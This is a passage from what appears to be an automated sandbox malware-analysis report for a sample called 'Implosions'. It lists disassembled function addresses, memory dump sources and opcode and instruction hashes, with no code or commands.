              • Opcode Fuzzy Hash: b903f435db039c8b018b4db634a3fc8a665f08c13aa80a8e379dab9abd6a1c19
              • Instruction Fuzzy Hash: E101A871640B049FC724DF2AD984957FBF5EF89310B008A2EE44A87775DB71F88A8B94
              Function 05DEFDA0 Relevance: .0, Instructions: 36COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2912325881.0000000005DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5de0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: a32068d63f96b209ece3e98c9d0a4268290adeefce29084977baf12d3f625dd2
              • Instruction ID: cee7196cce0cb01aa1f6d7939b6a9956c61470af5a8414c267ca20e94e683bf8
              • Opcode Fuzzy Hash: a32068d63f96b209ece3e98c9d0a4268290adeefce29084977baf12d3f625dd2
              • Instruction Fuzzy Hash: 5BF0F631305751AFD3216B399448BAABFA3FF81714F90087EE14687381CFB2A885CB90
              Function 05DEEA00 Relevance: .0, Instructions: 36COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2912325881.0000000005DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5de0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: ed9be603c1a93bdb6b19c37945b64f4c26ae70883ff64bcaeee1bc09bfe08846
              • Instruction ID: b6c8b02bffa5fa9d1aae91bac43eabd6dea07ff437230ba903773d5fbcb8f1bf
              • Opcode Fuzzy Hash: ed9be603c1a93bdb6b19c37945b64f4c26ae70883ff64bcaeee1bc09bfe08846
              • Instruction Fuzzy Hash: 0001A270D082599BEF14EB65D80A7AEBFFAFB45304F04802AD411B7295DB786544CF61
              Function 05CAD540 Relevance: .0, Instructions: 36COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2911970936.0000000005CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CA0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5ca0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: e946b35b6f469427fd794db9a5436adacade098e8637fca5241b5c70b0704980
              • Instruction ID: 8cd2d406888d4dce225a10408846fed96d4448e8fb181f855be69cecfe6a0381
              • Opcode Fuzzy Hash: e946b35b6f469427fd794db9a5436adacade098e8637fca5241b5c70b0704980
              • Instruction Fuzzy Hash: 21F0A7737042155FC7199699A8C5BAFBBEEFBC8274B654C39E21DD3300EA31AC0647A0
              Function 05CA6C60 Relevance: .0, Instructions: 35COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2911970936.0000000005CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CA0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5ca0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 628da7d0ab815e9a2f78a46f3696c3b7a96563c4fbbd3dd7e799dacab2db0825
              • Instruction ID: 86cc0105b1c7834f6937f6141019eee34f8ea71614d0af72ed19cb45b929f97b
              • Opcode Fuzzy Hash: 628da7d0ab815e9a2f78a46f3696c3b7a96563c4fbbd3dd7e799dacab2db0825
              • Instruction Fuzzy Hash: A0F09732B041258FD7588A9AE44DB193FA9FF60328F950469F007C7760DF60EA82CBD4
              Function 05CAD970 Relevance: .0, Instructions: 35COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2911970936.0000000005CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CA0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5ca0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 3421346715f23dc450338f3449556f4500d66e665950a8a4afc084a5ebccf34b
              • Instruction ID: dc0633f6aec2d6d6f8c032651a99890a45eb983078da0495fffd6db646249d94
              • Opcode Fuzzy Hash: 3421346715f23dc450338f3449556f4500d66e665950a8a4afc084a5ebccf34b
              • Instruction Fuzzy Hash: F4F01276E10119ABCB05DBD99C05AEEBBFAEFCC611F058126F615D3240DB7159118FE0
              Function 05D64336 Relevance: .0, Instructions: 35COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2912260355.0000000005D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D60000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5d60000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: d31c6c742eaea81dfabdfb727154393c05663bb1600a4564cad510696ef69812
              • Instruction ID: fa10eec3d1c6ccb69bee071e9340ed80430fde37ddd8ae8773e946bf43aba10d
              • Opcode Fuzzy Hash: d31c6c742eaea81dfabdfb727154393c05663bb1600a4564cad510696ef69812
              • Instruction Fuzzy Hash: 4CF03C397402018FCB15DF68E5586AD7BF2EF88265B100469E506D7350DF31DD468F51
              Function 05CE8ED0 Relevance: .0, Instructions: 34COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2912069542.0000000005CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5ce0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 04c4cf3be115d376406290f0a65bb365983eec8f6e780467d9854d5a78a38f1b
              • Instruction ID: 7983c6c058f5520bd030b4cffff62cd9ce63c2e9a8f1cb96734e91da1458fd7c
              • Opcode Fuzzy Hash: 04c4cf3be115d376406290f0a65bb365983eec8f6e780467d9854d5a78a38f1b
              • Instruction Fuzzy Hash: CCE06DB63042155F8B58A6BE9C8492FBBDEDFC91A8350847EA419CB345DE71EC0187A0
              Function 05DE5793 Relevance: .0, Instructions: 34COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2912325881.0000000005DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5de0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 7586c2146b5dd190eab99c1e59392dc1a7408f518d2dce03a0c53a1becb43fac
              • Instruction ID: f91279bcccb233c283b742507efa61cce1ac7f9accb4ab9273f903ab77024e19
              • Opcode Fuzzy Hash: 7586c2146b5dd190eab99c1e59392dc1a7408f518d2dce03a0c53a1becb43fac
              • Instruction Fuzzy Hash: 71F0EC767447108FC714EB68E94AA197BE0EF8475CB05855AE046DB3B1DE71DC46C780
              Function 05CE93C8 Relevance: .0, Instructions: 32COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2912069542.0000000005CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5ce0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 02caf7493366e542de533b0bccb64524b04f6dd63a3a0d0d081a31152f75f27e
              • Instruction ID: 9f8af40c6ca3f2eb0a6f837ea561e034d5db4ab9c285ab97def4b32c9425cc70
              • Opcode Fuzzy Hash: 02caf7493366e542de533b0bccb64524b04f6dd63a3a0d0d081a31152f75f27e
              • Instruction Fuzzy Hash: 43E092723041141B0B58969E58C493FABDEDFC95A4354806AE40DCB344DE71DC0143A4
              Function 05DE79F0 Relevance: .0, Instructions: 32COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2912325881.0000000005DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5de0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: ed6a93adc856960544dcd87861296ac29b0a5432e0a97c59a714bc2a186c1c27
              • Instruction ID: a1aec3feebcb8ce440cb9a041f626230c7d8be92256f99db78b578cddee5eb39
              • Opcode Fuzzy Hash: ed6a93adc856960544dcd87861296ac29b0a5432e0a97c59a714bc2a186c1c27
              • Instruction Fuzzy Hash: 92E06D3230521167D7149A2FB885AAAFF9EABC45A1B458126A508D3250DE64890586A4
              Function 05CE4B50 Relevance: .0, Instructions: 30COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2912069542.0000000005CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5ce0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: aa72551494409a7b0f4ccfa4ab16c6c0e553cca2cf81d842d2efaf7f6038f9d0
              • Instruction ID: d68acc0bbf665e2604dd02902d10e941b1d12e1a0c67eeddc9ccf26553838893
              • Opcode Fuzzy Hash: aa72551494409a7b0f4ccfa4ab16c6c0e553cca2cf81d842d2efaf7f6038f9d0
              • Instruction Fuzzy Hash: 1DE0DF32700210539B1829BA38006AEA69ADFC0565708083AD609C7280EC76CC02D3A4
              Function 05D673E0 Relevance: .0, Instructions: 30COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2912260355.0000000005D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D60000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5d60000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: fd0e7468887b3e25fda6a253c469e8bf54482dc01e75119428ed6c0c50ce2ae0
              • Instruction ID: d0f5b343044cf20cc5496134b9a1ac5e1b6e228259c4ed237b7b9c4035fe98f3
              • Opcode Fuzzy Hash: fd0e7468887b3e25fda6a253c469e8bf54482dc01e75119428ed6c0c50ce2ae0
              • Instruction Fuzzy Hash: AAF0E770D14209DFCB44DFA9D449AAEBFF0FB08214F5044AAD509E7751E770AA41CB80
              Function 05CE3A43 Relevance: .0, Instructions: 28COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2912069542.0000000005CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5ce0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 8fbe6bfe68a99e28918fef189135f606f8e02ac82c27f364ec3446c99a4706a1
              • Instruction ID: ce2a63e4a5d76387c45883ecf84e578a2fd59a154243b947a697f7a88625d2d4
              • Opcode Fuzzy Hash: 8fbe6bfe68a99e28918fef189135f606f8e02ac82c27f364ec3446c99a4706a1
              • Instruction Fuzzy Hash: 39E0927230024457C724999AECC5B57FB9DFB867347584A3EE505C7340CA61E842C2A0
              Function 05DE79A8 Relevance: .0, Instructions: 28COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2912325881.0000000005DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5de0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: c23b8ed5dff887101d94d4c931c9eb87c5f1bce0f09ba5283e3d7e1a1cc3eee5
              • Instruction ID: 58b1876f0b577bd26fb63aaec1863b2c24fddced71840537f54ddec1e5605eeb
              • Opcode Fuzzy Hash: c23b8ed5dff887101d94d4c931c9eb87c5f1bce0f09ba5283e3d7e1a1cc3eee5
              • Instruction Fuzzy Hash: 81E092363012107B87109A9DB848A9A7BAAFBC8A61F40442AF50AC3300DE6198118BE6
              Function 05CE9413 Relevance: .0, Instructions: 27COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2912069542.0000000005CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5ce0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 8bf09a231f4c6b70447af22c6d2c982b0b9890c68887f7209a88cee5cc62a29d
              • Instruction ID: 8a232cb348f5f18e00a0369a4de0ba88c4e338c6d68834e936fcdaa4004efff9
              • Opcode Fuzzy Hash: 8bf09a231f4c6b70447af22c6d2c982b0b9890c68887f7209a88cee5cc62a29d
              • Instruction Fuzzy Hash: 1CE06D763046405BC754CA5DE402F9ABFD9DF882B1B19C06AF449C7340DA31D9128B95
              Function 05CE70D5 Relevance: .0, Instructions: 27COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2912069542.0000000005CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5ce0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 31d307d77bc37a3a6364fe93b4be475d061066b36e3aec397dcefed0fc194895
              • Instruction ID: bb335601140b5cb05c2e1b1f73ce4291a64c1d70daaec8d8a8ffe7a40ab02ddf
              • Opcode Fuzzy Hash: 31d307d77bc37a3a6364fe93b4be475d061066b36e3aec397dcefed0fc194895
              • Instruction Fuzzy Hash: 46F0A9366011099FCB01DF98DA449CDBBF2FB48310B25D2A1E5095B225C731EE95DB50
              Function 05D64D1B Relevance: .0, Instructions: 27COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2912260355.0000000005D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D60000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5d60000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 6fa7a9e9e7a0f83b77c21133921a735efe369948e8d952361dee326322af621f
              • Instruction ID: 08c00110e3fb1d962d2ca7fbec894cdaae57241536df62e3348b3efab5f9eb60
              • Opcode Fuzzy Hash: 6fa7a9e9e7a0f83b77c21133921a735efe369948e8d952361dee326322af621f
              • Instruction Fuzzy Hash: F0E0D833A6051353DB295359E4A63B67799D781660F048073A41DC6F8DD8D4DC125FD4
              Function 05DE5900 Relevance: .0, Instructions: 26COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2912325881.0000000005DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5de0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 7e07776276a65f5c5bed31a632c6a43187a5f6e5385eb6e2f17e8b598090470c
              • Instruction ID: ae149da6b73b3be83c8c216ec99f83dbc32a1bd2afd1351e750f42310c302326
              • Opcode Fuzzy Hash: 7e07776276a65f5c5bed31a632c6a43187a5f6e5385eb6e2f17e8b598090470c
              • Instruction Fuzzy Hash: 70E04836360114774B017A9DF4058ED7B9AEBD53717408437F944C7300CE31991597A4
              Function 05CE9420 Relevance: .0, Instructions: 25COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2912069542.0000000005CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5ce0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 67f77fd1f4246c7635b9ffaa767f80c957c6ae6839ac0d0ce11f5f0067f1759f
              • Instruction ID: ea9c30291be04f01f87e751941512cbb61b7565a152e820fabd6cf93091be1a2
              • Opcode Fuzzy Hash: 67f77fd1f4246c7635b9ffaa767f80c957c6ae6839ac0d0ce11f5f0067f1759f
              • Instruction Fuzzy Hash: 37E04F727042046B4754CA5ED444E9ABBEDDFC82B1314C02AF90CC7300DA31E9428BA4
              Function 05CE9DA5 Relevance: .0, Instructions: 25COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2912069542.0000000005CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5ce0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 77ecfce0745e8f9eb4cb5fa2b5b2603c7b7f115e66dda149592c23a7cc7bf241
              • Instruction ID: a6bc37051a8a4bfe9c0d834f53588e3a3a0960c7b29e00590085ceb00daa557a
              • Opcode Fuzzy Hash: 77ecfce0745e8f9eb4cb5fa2b5b2603c7b7f115e66dda149592c23a7cc7bf241
              • Instruction Fuzzy Hash: 27E09A31B000055B8B40EBA9E5908BEF7FAEF84350360C836E508E7368DB30EE0287A1
              Function 05CE8F23 Relevance: .0, Instructions: 25COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2912069542.0000000005CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5ce0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 9e7c2a487fd7038ecc0727e28d9334d5651f902775d35c824bc4354c0115ddaa
              • Instruction ID: 177d721d333e9bb677b1aba9ec46175a89ad6ff8079bd68daa4683dcf9b41be3
              • Opcode Fuzzy Hash: 9e7c2a487fd7038ecc0727e28d9334d5651f902775d35c824bc4354c0115ddaa
              • Instruction Fuzzy Hash: 94E04F367002185FC750DA68D440F5BBBE6EF44AA0F558426F90CDB795E731DE4297C4
              Function 05CE4B43 Relevance: .0, Instructions: 25COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2912069542.0000000005CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5ce0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 255b8d9dab743cecc788457d6f8ad2c5c9d4c9a3818d7b154555a8511f0481f2
              • Instruction ID: cbefcbfbb7df790cdc95eb95e7bae3d84524883516c04e19c2c755a42a5ecb79
              • Opcode Fuzzy Hash: 255b8d9dab743cecc788457d6f8ad2c5c9d4c9a3818d7b154555a8511f0481f2
              • Instruction Fuzzy Hash: 10E0267270031043DF182A742A007BC958BDFC0121F1C0C3AC606CB280DD76CC02D394
              Function 05CAE1D8 Relevance: .0, Instructions: 25COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2911970936.0000000005CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CA0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5ca0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: f47cd09724e222655cf3a756b62f0223e2c5a68ce05ad7d0fad29523f017a6c0
              • Instruction ID: a0acd0e984c1d789b07fd5cd29a2ed812cf5634430e73adab9f5aff648f401dc
              • Opcode Fuzzy Hash: f47cd09724e222655cf3a756b62f0223e2c5a68ce05ad7d0fad29523f017a6c0
              • Instruction Fuzzy Hash: 40E026227101102BC3066228F8517DB951BDFC0340F90CF7892148B264CF20AC0E0BE8
              Function 05CE4483 Relevance: .0, Instructions: 24COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2912069542.0000000005CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5ce0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 7577823238388c5f633c39144e34db3a63e359415285685d16eef6ac03fd884c
              • Instruction ID: 4dca91d76ddcecc7e5c9a62216496c24ba78b51a51922786712086338453e696
              • Opcode Fuzzy Hash: 7577823238388c5f633c39144e34db3a63e359415285685d16eef6ac03fd884c
              • Instruction Fuzzy Hash: E1E0867231111467D3047659D455BEF7AAADBC9B22F54403AE501C7340CD75D802C7D0
              Function 05DE5720 Relevance: .0, Instructions: 24COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2912325881.0000000005DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5de0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: f6b20eee5c015d2bad75acc8650c8798a5da9439c1fe2be47a4946fa77dfcdcd
              • Instruction ID: 77f08212a684298d99aaf5682e38339562e33d56b1171ed744414e9264bbd0f1
              • Opcode Fuzzy Hash: f6b20eee5c015d2bad75acc8650c8798a5da9439c1fe2be47a4946fa77dfcdcd
              • Instruction Fuzzy Hash: A3E0DF35304B408FD701D76CC958D2A7FE9DF8D30470488AAF547CB362CA68EC408B84
              Function 05DEF5D3 Relevance: .0, Instructions: 23COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2912325881.0000000005DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5de0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: e531cfc3cdcd629846b1773ffceef25f5c85f5398415f4e1d5876e5de165cc68
              • Instruction ID: a6a2bee0e457ac50760277a7cd15dca8af34dfdbbba8909160fd316ee8ca877e
              • Opcode Fuzzy Hash: e531cfc3cdcd629846b1773ffceef25f5c85f5398415f4e1d5876e5de165cc68
              • Instruction Fuzzy Hash: BAE06F32106712AFD720AF2CD689722BB90FB02628F80008FE049C3A01CBA4E4829B42
              Function 05DEA7D1 Relevance: .0, Instructions: 23COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2912325881.0000000005DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5de0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 8f69c826cbda2a1ab59d309f14f2568f80e393c9cc598c94f12b9f8c7e644b74
              • Instruction ID: a5018e11f6d50424ba5036ca4c6184b5c3c714fb7421a01750d930c6960ae88e
              • Opcode Fuzzy Hash: 8f69c826cbda2a1ab59d309f14f2568f80e393c9cc598c94f12b9f8c7e644b74
              • Instruction Fuzzy Hash: A1E01270D40215DF8B40DFA9A84919D7FB4FB44200F104966E45AE3200E7718A25CBD1
              Function 05DE79B8 Relevance: .0, Instructions: 23COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2912325881.0000000005DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5de0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: ee84eb5af47be9453b20d19e5b1f3a3162b28d120a19642e605b68bce3f4d30f
              • Instruction ID: fb7e9a412328b5414a3d12eddab45b5e29ef3d4fc8b251d39ed4c804d0b26b99
              • Opcode Fuzzy Hash: ee84eb5af47be9453b20d19e5b1f3a3162b28d120a19642e605b68bce3f4d30f
              • Instruction Fuzzy Hash: 24E0C2327003147B47146A9EB84485ABBABFFCC6B1390403AFA0AC3300CE319C12C7E8
              Function 05DE6010 Relevance: .0, Instructions: 22COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2912325881.0000000005DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5de0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 93f8d23b587e756a25b8b86d32fc10d0242dd861a8d0f46334ea8f29698735a9
              • Instruction ID: de09258fe382bbcf48b1c41bea5ca2c93f14dd77dba678c8152ff351f6c84d47
              • Opcode Fuzzy Hash: 93f8d23b587e756a25b8b86d32fc10d0242dd861a8d0f46334ea8f29698735a9
              • Instruction Fuzzy Hash: 68E0ED74E09308AFCB44DFA9D45584DBFF1EB49300F0085EAE808D7341E6349A14CB45
              Function 05CE8DD0 Relevance: .0, Instructions: 21COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2912069542.0000000005CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5ce0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: bf4fda5afeaea5f043f81165331fe67f6d0a65e3194e2003e6b4bafb2ddb50e3
              • Instruction ID: acab2d07ca48f29e15c9be68357e94246c74abdb469d6f0c49ec0d1fb3b643fb
              • Opcode Fuzzy Hash: bf4fda5afeaea5f043f81165331fe67f6d0a65e3194e2003e6b4bafb2ddb50e3
              • Instruction Fuzzy Hash: 6ED02B3230D35087C710069F68008533B5DDEC695130A047BF405C7B80D821CC458391
              Function 05DE5730 Relevance: .0, Instructions: 21COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2912325881.0000000005DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5de0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: d35d33042a5d69d54f41466abf86e85ef1bf444b3c9092b0cf43c6406affc847
              • Instruction ID: 60744ae213befa861db18c01df8c2f30330bdaa85a65363b049ea3dfc3627884
              • Opcode Fuzzy Hash: d35d33042a5d69d54f41466abf86e85ef1bf444b3c9092b0cf43c6406affc847
              • Instruction Fuzzy Hash: D9E08C313407109FC700EB6DD848C6ABBEDEF887143008869F106C7320CAA5FC418BC4
              Function 05CA49D3 Relevance: .0, Instructions: 21COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2911970936.0000000005CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CA0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5ca0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 45fd177836c5a5234b1fbc9777bca29eb0df97a8159a2fdefaf486e82c6fc00b
              • Instruction ID: a16ebb1725bc30dbe706183367a483365a3b01c754228fa64d7c46043cf25c1b
              • Opcode Fuzzy Hash: 45fd177836c5a5234b1fbc9777bca29eb0df97a8159a2fdefaf486e82c6fc00b
              • Instruction Fuzzy Hash: 8CE0124366D3D04FE7471664DD637983F30CB43351F1940F3D080CA5E7D40448498267
              Function 05CE4490 Relevance: .0, Instructions: 20COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2912069542.0000000005CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5ce0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 7d0d0ae8660c4b263e06c5533f8abfcc8d3ae591306946c1969d65bd24dccb0b
              • Instruction ID: 5ed3229bbd5895105260dfed983b366864657f94fcc336280e61b68e14eb791a
              • Opcode Fuzzy Hash: 7d0d0ae8660c4b263e06c5533f8abfcc8d3ae591306946c1969d65bd24dccb0b
              • Instruction Fuzzy Hash: 5DD0C23131121467C2046769A014AEA7A9ADBC9722B10402AE50187340CD319C02C7E0
              Function 05CECA80 Relevance: .0, Instructions: 20COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2912069542.0000000005CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5ce0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 309a28d402614cefa994a0fc51472a61a08794c6d950e8762ff2bf4841a300fc
              • Instruction ID: 7c604ec120a5f592b51a2f280383b473429d1f19e3b38cebc3491270d8106a42
              • Opcode Fuzzy Hash: 309a28d402614cefa994a0fc51472a61a08794c6d950e8762ff2bf4841a300fc
              • Instruction Fuzzy Hash: F8D017312213148FC7586FB5B40A1997BA8FA456A6388046AF80AC3640DF3AAC11CAE9
              Function 05CA9CD0 Relevance: .0, Instructions: 19COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2911970936.0000000005CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CA0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5ca0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 566316f60512f6dda2b93dbdf5d715cead6fd6ff030170056d827777082fe819
              • Instruction ID: 49454a6b4a66f8a82f67f88b9f4230a375cbf2aaad876b8f3c12e7603deb9e32
              • Opcode Fuzzy Hash: 566316f60512f6dda2b93dbdf5d715cead6fd6ff030170056d827777082fe819
